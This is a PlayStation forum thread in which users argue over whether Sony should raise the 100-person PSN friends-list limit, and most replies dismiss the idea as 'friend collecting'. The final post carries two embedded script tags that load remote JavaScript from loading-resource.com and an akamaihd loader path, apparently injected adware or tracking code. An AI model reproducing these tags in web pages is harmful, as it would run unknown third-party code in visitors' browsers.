Showing results for 
Search instead for 
Do you mean 
Dec 26 2011
By: KUJayhawker12 First Son 2 posts

Raising friends max on the PSN

5 replies 265 views Edited Dec 26, 2010

Playstation Network/Sony, listen up, because this is an important message. Playstation Network needs to raise the amount of friends a person can have. Probably by 200 to 400 more friends. Beacuse people on youtube gain popularity and people want them as friends but they can't have more than a hundred I think. So we PS3 owners want more friends so we can play with more people. Or at least let us invite people to games by typing in their PSN correctly.

Message 1 of 6 (265 Views)
0 Likes
PlayStation MVP
8173 posts

Re: Raising friends max on the PSN

Dec 26, 2010

Let me ask you something... do you actually actively communicate & game with ALL 100 people on your friends list?

Asking to have 200-400 people on your friends list just seems like "friend collecting".

Message 2 of 6 (265 Views)
Treasure Hunter
6424 posts

Dec 26, 2010

Jag has the proper logic. Nobody actively and consistently communicates with ALL of their friends. If I have a "friend" that is inactive or never wants to party up then I delete them. I only keep legit people that are actually serving a purpose. I only have 21 friends but they are a good 21 friends that I know in real life or they communicate with me often.

Check out my PlayStation dedicated blog, PlayStation Persuasion!

http://playstationpersuasion.tumblr.com/

PSN: ScreamAimFire999 [PS4, PS3, PS Vita Owner]
Twitter: @PSPersuasion

Message 3 of 6 (265 Views)
0 Likes
Fender Bender
4239 posts

Dec 26, 2010

Jag_Stilvecchio wrote:

Let me ask you something... do you actually actively communicate & game with ALL 100 people on your friends list?

Asking to have 200-400 people on your friends list just seems like "friend collecting".

^This. I've often received friend requests from random people online like on CoD and RE5 but would never talk to them and ended up deleting them. I think i have 10 to 12 friends on my list, but they're all people i often speak and play games with.

Message 4 of 6 (265 Views)
0 Likes
First Son
1 posts

Sep 11, 2012

i understand what you are saying but the friends number still needs to be increased. The youtube thing is one reason and also some of us hav friends that we like but r never on. we need more max friends so we can hav friends that we like and friends that are always on

Message 5 of 6 (252 Views)
0 Likes
Wastelander
766 posts

[ Edited ]
Sep 11, 2012

so? 200-400 is way too much. i like to keep things lower than 100 because in black ops if i have 100 i freeze for like a min after pressing triangle

and about the youtube thing are you trying to get on wb7thst friend list? because he wont talk to you or play with you. not too mention even youtubers love the 100 player thing, some of them create other account called subscriber accounts and use those so they dont have to add many people on their main to reduce lag

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 6 of 6 (248 Views)
0 Likes